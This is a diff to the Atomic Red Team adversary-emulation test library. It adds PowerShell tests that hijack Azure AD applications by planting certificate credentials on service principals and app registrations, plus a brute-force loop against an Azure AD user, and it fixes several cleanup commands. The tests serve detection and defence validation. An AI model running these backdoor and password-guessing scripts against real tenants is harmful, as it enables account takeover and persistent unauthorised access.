+rm "#{path_to_cert}\#{application_name}.pfx"
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AzureAD) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - AWS - Create Access Key and Secret Key
Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised
**Supported Platforms:** Iaas:aws
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
index 6435b055..4c349f97 100644
--- a/atomics/T1098.001/T1098.001.yaml
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -1,6 +1,171 @@
attack_technique: T1098.001
display_name: 'Account Manipulation: Additional Cloud Credentials'
atomic_tests:
+- name: Azure AD Application Hijacking - Service Principal
+ auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406
+ description: |
+ Add a certificate to an Application through its Service Principal.
+ The certificate can then be used to authenticate as the application and benefit from its rights.
+ An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default: jonh@contoso.com
+ password:
+ description: Azure AD password
+ type: String
+ default: p4sswd
+ service_principal_name:
+ description: Name of the targeted service principal
+ type: String
+ default: SuperSP
+ certificate_password:
+ description: Password of the new certificate
+ type: string
+ default: Passw0rd
+ path_to_cert:
+ description: Path of the new certificate, locally stored
+ type: string
+ default: $env:TEMP
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ AzureAD module must be installed.
+ prereq_command: |
+ if (Get-Module AzureAD) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ executor:
+ command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+ if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+ # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
+ $certNotAfter = (Get-Date).AddDays(2)
+ $credNotAfter = (Get-Date).AddDays(1)
+ $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+ $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+ Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd
+
+ $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+ New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+ Start-Sleep -s 30
+ $tenant=Get-AzureADTenantDetail
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+ Write-Host "End of Hijacking"
+
+ cleanup_command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+ $credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
+ foreach ($cred in $credz) {
+ if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+ Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId
+ }
+ }
+ Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
+ rm "#{path_to_cert}\#{service_principal_name}.pfx"
+
+ name: powershell
+ elevation_required: false
+
+- name: Azure AD Application Hijacking - App Registration
+ auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a
+ description: |
+ Add a certificate to an Application through its App Registration.
+ The certificate can then be used to authenticate as the application and benefit from its rights.
+ An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default: jonh@contoso.com
+ password:
+ description: Azure AD password
+ type: String
+ default: p4sswd
+ application_name:
+ description: Name of the targeted application
+ type: String
+ default: SuperApp
+ certificate_password:
+ description: Password of the new certificate
+ type: string
+ default: Passw0rd
+ path_to_cert:
+ description: Path of the new certificate, locally stored
+ type: string
+ default: $env:TEMP
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ AzureAD module must be installed.
+ prereq_command: |
+ if (Get-Module AzureAD) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ executor:
+ command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $app = Get-AzureADApplication -Searchstring "#{application_name}"
+ if ($app -eq $null) { Write-Warning "Application not found"; exit }
+ $certNotAfter = (Get-Date).AddDays(2)
+ $credNotAfter = (Get-Date).AddDays(1)
+ $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+ $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+ Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd
+
+ $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+ New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+ Start-Sleep -s 30
+ $tenant=Get-AzureADTenantDetail
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+ Write-Host "End of Hijacking"
+
+ cleanup_command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $app = Get-AzureADApplication -Searchstring "#{application_name}"
+ $credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
+ foreach ($cred in $credz) {
+ if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") {
+ Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId
+ }
+ }
+ Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
+ rm "#{path_to_cert}\#{application_name}.pfx"
+
+ name: powershell
+ elevation_required: false
+
- name: AWS - Create Access Key and Secret Key
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
description: |
@@ -28,4 +193,7 @@ atomic_tests:
access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
aws iam delete-access-key --access-key-id $access_key --user-name #{username}
rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
- name: sh
\ No newline at end of file
+ name: sh
+
+
+
diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md
index bb98a2d2..c76ba1bd 100644
--- a/atomics/T1110.001/T1110.001.md
+++ b/atomics/T1110.001/T1110.001.md
@@ -29,6 +29,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
- [Atomic Test #2 - Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)](#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos)
+- [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user)
+
@@ -131,4 +133,66 @@ Write-Host "End of bruteforce"
+
+
+
+## Atomic Test #3 - Brute Force Credentials of single Azure AD user
+Attempt to brute force Azure AD user via AzureAD powershell module.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 5a51ef57-299e-4d62-8e11-2d440df55e69
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@" | String | bruce.wayne@contoso.com|
+| passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Import-Module -Name AzureAD
+
+$passwords = "#{passwords}".split("{`n}")
+foreach($password in $passwords) {
+ $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ try {
+ Write-Host " [-] Attempting ${password} on account #{username}."
+ Connect-AzureAD -Credential $Credential 2>&1> $null
+ # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+ Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+ break
+ } catch {
+ Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+ }
+}
+Write-Host "End of bruteforce"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AzureAD) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 5601e6b1..495befef 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -84,3 +84,47 @@ atomic_tests:
}
}
Write-Host "End of bruteforce"
+- name: Brute Force Credentials of single Azure AD user
+ auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
+ description: |
+ Attempt to brute force Azure AD user via AzureAD powershell module.
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@"
+ type: String
+ default: bruce.wayne@contoso.com
+ passwords:
+ description: List of passwords we will attempt to brute force with
+ type: String
+ default: Password1`n1q2w3e4r`nPassword!
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ AzureAD module must be installed.
+ prereq_command: |
+ if (Get-Module AzureAD) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Import-Module -Name AzureAD
+
+ $passwords = "#{passwords}".split("{`n}")
+ foreach($password in $passwords) {
+ $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ try {
+ Write-Host " [-] Attempting ${password} on account #{username}."
+ Connect-AzureAD -Credential $Credential 2>&1> $null
+ # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+ Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+ break
+ } catch {
+ Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+ }
+ }
+ Write-Host "End of bruteforce"
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 3a6992bb..87763ed2 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -75,7 +75,7 @@ Network Share Discovery using smbstatus
| package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba|
-#### Attack Commands: Run with `bash`!
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml
index ff02d0ae..09be538c 100644
--- a/atomics/T1135/T1135.yaml
+++ b/atomics/T1135/T1135.yaml
@@ -45,7 +45,7 @@ atomic_tests:
command: |
smbstatus --shares
name: bash
- elevation_require: true
+ elevation_required: true
- name: Network Share Discovery command prompt
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
description: |
diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md
index 7ab024da..9af874c7 100644
--- a/atomics/T1136.002/T1136.002.md
+++ b/atomics/T1136.002/T1136.002.md
@@ -133,7 +133,7 @@ $User
#### Cleanup Commands:
```powershell
-net user "#{username}" >nul 2>&1 /del /domain
+cmd /c "net user #{username} /del >nul 2>&1"
```
diff --git a/atomics/T1136.002/T1136.002.yaml b/atomics/T1136.002/T1136.002.yaml
index 4bdc79bb..c8a4875e 100644
--- a/atomics/T1136.002/T1136.002.yaml
+++ b/atomics/T1136.002/T1136.002.yaml
@@ -81,6 +81,6 @@ atomic_tests:
$User.Save()
$User
cleanup_command: |
- net user "#{username}" >nul 2>&1 /del /domain
+ cmd /c "net user #{username} /del >nul 2>&1"
name: powershell
elevation_required: false # Requires a user to be a Domain Admin!
diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md
index d3aaeda3..b9992d60 100644
--- a/atomics/T1543.004/T1543.004.md
+++ b/atomics/T1543.004/T1543.004.md
@@ -40,6 +40,11 @@ sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
```
+#### Cleanup Commands:
+```bash
+sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
+sudo rm /Library/LaunchDaemons/#{plist_filename}
+```
diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml
index 7e4b5428..27adc319 100644
--- a/atomics/T1543.004/T1543.004.yaml
+++ b/atomics/T1543.004/T1543.004.yaml
@@ -32,7 +32,7 @@ atomic_tests:
command: |
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
- cleanup: |
+ cleanup_command: |
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 4b83c6ba..bdecd84c 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -728,3 +728,7 @@ b4988cad-6ed2-434d-ace5-ea2670782129
649349c7-9abf-493b-a7a2-b1aa4d141528
a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
+5a51ef57-299e-4d62-8e11-2d440df55e69
+b8e747c3-bdf7-4d71-bce2-f1df2a057406
+a12b5531-acab-4618-a470-0dafb294a87a
+d400090a-d8ca-4be0-982e-c70598a23de9